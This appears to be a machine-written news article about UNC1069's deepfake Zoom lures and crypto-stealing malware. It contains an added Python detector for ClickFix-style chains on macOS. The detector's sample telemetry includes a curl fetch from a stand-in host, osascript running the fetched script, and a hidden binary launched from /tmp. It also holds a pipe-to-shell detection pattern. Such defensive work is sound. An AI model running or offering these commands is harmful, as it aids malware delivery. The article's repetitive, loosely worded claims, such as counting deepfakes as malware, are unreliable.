Ethical Hacking News
A North Korea-linked threat actor known as UNC1069 has been using artificial intelligence (AI) lures to attack cryptocurrency organizations, compromising Windows and macOS systems with the goal of facilitating financial theft. The group's use of AI-generated video, social engineering schemes, and malware families marks a significant expansion in their capabilities.
Researchers at Google Mandiant have been tracking a North Korea-linked threat actor known as UNC1069, which has been targeting cryptocurrency organizations using sophisticated social engineering tactics. UNC1069 has shifted from spear-phishing techniques to the Web3 industry, including centralized exchanges and software developers in financial institutions. The group uses AI-generated video, phishing schemes, and malware families to conduct its attacks. One of the latest attacks involved deploying seven unique malware families, including deepfakes and a backdoor called BIGMACHO. The attackers use Calendly to schedule meetings with victims and force them into watching fake Zoom meetings using clickjacking. The malware families deployed by UNC1069 include tools for gathering system information, distributing additional payloads, and stealing cryptocurrency credentials. The group's use of deepfakes and AI-generated content marks a new level of sophistication in its social engineering tactics.
In recent months, researchers at Google Mandiant have been tracking a North Korea-linked threat actor known as UNC1069, which has been observed targeting cryptocurrency organizations using sophisticated social engineering tactics. The group's use of AI-generated video, phishing schemes, and malware families marks a significant expansion in their capabilities.
According to the researchers, UNC1069 has been active since at least April 2018 and has a history of conducting social engineering campaigns for financial gain using fake meeting invites and posing as investors from reputable companies on Telegram. The group is also tracked by the broader cybersecurity community under the monikers CryptoCore and MASAN.
In November last year, Google Threat Intelligence Group (GTIG) published a report highlighting the threat actor's use of generative artificial intelligence (AI) tools like Gemini to produce lure material and other cryptocurrency-related messaging in support of its social engineering campaigns. The group has also been observed attempting to misuse Gemini to develop code to steal cryptocurrency, and has used deepfake images and video lures mimicking individuals in the cryptocurrency industry to distribute a backdoor called BIGMACHO to victims by passing it off as a Zoom software development kit (SDK).
The researchers noted that since at least 2023, the group has shifted from spear-phishing techniques and traditional finance (TradFi) targeting towards the Web3 industry, such as centralized exchanges (CEX), software developers at financial institutions, high-technology companies, and individuals at venture capital funds.
In the latest intrusion documented by Google's threat intelligence division, UNC1069 is said to have deployed as many as seven unique malware families, including several new malware families, such as SILENCELIFT, DEEPBREATH, and CHROMEPUSH. The group's tactics involve approaching victims via Telegram by impersonating venture capitalists and, in a few cases, even using compromised accounts of legitimate entrepreneurs and startup founders.
Once contact is established, the threat actor uses Calendly to schedule a 30-minute meeting with the victim. The attackers then use clickjacking to force the victim into a fake Zoom meeting interface that mirrors a real video call experience, and ask them to enable their camera and enter their name in order to join the meeting.
The videos shown in the fake meeting are suspected to be either deepfakes or real recordings stealthily captured from other victims who had previously fallen prey to the same scheme. The attackers replay this footage to deceive new victims into believing they are participating in a genuine live call. When the video replay ends, the page smoothly transitions to showing that user's profile image, maintaining the illusion of a live call.
The attack proceeds to the next phase when the victim is shown a bogus error message about an audio issue, after which they are prompted to download and run a ClickFix-style troubleshooting command to address the problem. In the case of macOS, the commands lead to the delivery of an AppleScript that, in turn, drops a malicious Mach-O binary on the system.
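The chain described above (a pasted "troubleshooting" command in Terminal, a fetch of an AppleScript, osascript running it, and a Mach-O executing from a temporary path) leaves a recognisable shape in endpoint process telemetry. The following is an added illustration of how a defender might flag that shape; it is not code from the article, Google, Mandiant, or the threat actor. The JSON-lines event format, process names, paths, `.invalid` hostnames and all sample records are assumptions constructed for this example, and the heuristic is deliberately generic rather than tied to any real indicator from the campaign.

```python
"""Flag ClickFix-style execution chains in macOS process telemetry.

Illustrative example only (not from the article or any vendor).  Assumes a
JSON-lines feed of process-start events with pid, ppid, image and cmdline,
roughly what an EDR or Endpoint Security client would emit.
"""
import json
import os
import re
from collections import defaultdict

TERMINAL_APPS = {"Terminal", "iTerm2", "Hyper", "Alacritty"}
FETCH_TOOLS = {"curl", "wget"}
SCRIPT_RUNNERS = {"osascript"}
# Executables launched from /tmp, /private/tmp, per-user /var/folders, or a
# dot-file basename are unusual for an interactive developer session.
TEMP_EXEC_RE = re.compile(r"^/(private/)?(tmp|var/folders)/|/\.[^/]+$")
# A one-liner such as `curl ... | sh` carries fetch and execution in one shell.
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(sudo\s+)?(ba|z)?sh\b|\|\s*osascript\b")

# Constructed sample telemetry: one benign developer session interleaved with
# a ClickFix-style chain, plus an unrelated Zoom process.  All values made up.
SAMPLE_EVENTS = """
{"pid": 501, "ppid": 1,   "image": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", "cmdline": "Terminal"}
{"pid": 502, "ppid": 501, "image": "/bin/zsh", "cmdline": "-zsh"}
{"pid": 503, "ppid": 502, "image": "/usr/bin/git", "cmdline": "git pull --rebase"}
{"pid": 504, "ppid": 502, "image": "/usr/bin/curl", "cmdline": "curl -fsSL https://audio-fix.example.invalid/fix.scpt -o /tmp/fix.scpt"}
{"pid": 505, "ppid": 502, "image": "/usr/bin/osascript", "cmdline": "osascript /tmp/fix.scpt"}
{"pid": 506, "ppid": 505, "image": "/private/tmp/.helper", "cmdline": "/private/tmp/.helper"}
{"pid": 601, "ppid": 1,   "image": "/Applications/zoom.us.app/Contents/MacOS/zoom.us", "cmdline": "zoom.us"}
"""


def parse_events(text):
    """Parse JSON-lines process events, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def classify(ev):
    """Return the set of ClickFix stages a single process event evidences."""
    name = os.path.basename(ev["image"])
    cmd = ev.get("cmdline", "")
    stages = set()
    if name in FETCH_TOOLS:
        stages.add("fetch")
    if name in SCRIPT_RUNNERS:
        stages.add("script")
    if any(tool in cmd for tool in FETCH_TOOLS) and PIPE_TO_SHELL_RE.search(cmd):
        stages.update({"fetch", "script"})
    if TEMP_EXEC_RE.search(ev["image"]):
        stages.add("temp_exec")
    return stages


def find_clickfix_chains(events):
    """Return one finding per interactive shell whose descendants show a
    fetch followed by script execution or a temp-path binary."""
    procs = {ev["pid"]: ev for ev in events}
    children = defaultdict(list)
    for ev in events:
        children[ev["ppid"]].append(ev["pid"])

    def descendants(pid):
        stack = list(children[pid])
        while stack:
            p = stack.pop()
            yield p
            stack.extend(children[p])

    findings = []
    for ev in events:
        if os.path.basename(ev["image"]) not in TERMINAL_APPS:
            continue
        # Each shell directly under the terminal app is one user session.
        for shell_pid in children[ev["pid"]]:
            stages, evidence = set(), []
            for pid in descendants(shell_pid):
                hit = classify(procs[pid])
                if hit:
                    stages |= hit
                    evidence.append(procs[pid]["cmdline"])
            if "fetch" in stages and ("script" in stages or "temp_exec" in stages):
                findings.append({"shell_pid": shell_pid,
                                 "stages": sorted(stages),
                                 "evidence": evidence})
    return findings


if __name__ == "__main__":
    for finding in find_clickfix_chains(parse_events(SAMPLE_EVENTS)):
        print(json.dumps(finding, indent=2))
```

The rule keys on the combination rather than any single process: developers run curl and osascript legitimately, but a fetch followed by script interpretation or by a binary executing from a temporary or hidden path inside the same interactive shell session is the shape a pasted "fix" command produces, so that combination is what gets surfaced for analyst review.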
The malware families deployed by UNC1069 include several C++ executables designed to gather system information and distribute additional payloads. A follow-on Golang backdoor component known as HIDDENCALL provides hands-on keyboard access to the compromised system, while a Swift-based data miner called DEEPBREATH is used to steal iCloud Keychain credentials and data from Google Chrome, Brave, and Microsoft Edge.
Another C++ downloader called SUGARLOADER is used to deploy CHROMEPUSH, which acts as a data stealer masquerading as a tool for editing Google Docs offline. This malware also comes with the ability to record keystrokes, observe username and password inputs, and extract browser cookies.
The group's use of multiple new malware families alongside the known downloader SUGARLOADER marks a significant expansion in their capabilities. The volume of tooling deployed on a single host indicates a highly determined effort to harvest credentials, browser data, and session tokens to facilitate financial theft.
"Their webcam footage had been unknowingly recorded, then uploaded to attacker-controlled infrastructure, and reused to deceive other victims," noted Kaspersky in an earlier incident. "When the video replay ended, the page smoothly transitioned to showing that user’s profile image, maintaining the illusion of a live call."
The use of deepfakes and AI-generated videos by UNC1069 marks a new level of sophistication in its social engineering tactics. The group's use of these tools makes it increasingly difficult for victims to distinguish between real and fake communications, making them more susceptible to falling prey to phishing schemes.
In light of this new threat, cybersecurity professionals and organizations must be on high alert for signs of UNC1069's activity. Companies that operate in the cryptocurrency space should take immediate action to patch vulnerabilities, implement robust security measures, and educate their employees about the tactics, techniques, and procedures (TTPs) used by this group.
The use of AI-generated content by threat actors like UNC1069 also highlights the need for organizations to develop more sophisticated tools and strategies to detect and mitigate these threats. In particular, the development of machine learning algorithms that can accurately identify and flag potential phishing attempts will be crucial in countering the use of deepfakes and AI-generated videos.
Ultimately, the success of threat actors like UNC1069 depends on their ability to adapt and evolve their tactics. As organizations strengthen their security measures, these groups will continue to develop new strategies that exploit human psychology and social vulnerabilities.
In conclusion, the recent attacks by UNC1069 demonstrate a significant expansion in the capabilities of North Korea-linked threat actors. The group's use of AI-generated content, deepfakes, and multiple malware families marks a new level of sophistication in its social engineering tactics. As the cryptocurrency space continues to evolve, it is essential for organizations to remain vigilant and proactive in countering these threats.
Related Information:
https://www.ethicalhackingnews.com/articles/North-Korea-Linked-UNC1069-Uses-AI-Lures-to-Attack-Cryptocurrency-Organizations-ehn.shtml
Published: Wed Feb 11 01:18:35 2026 by llama3.2 3B Q4_K_M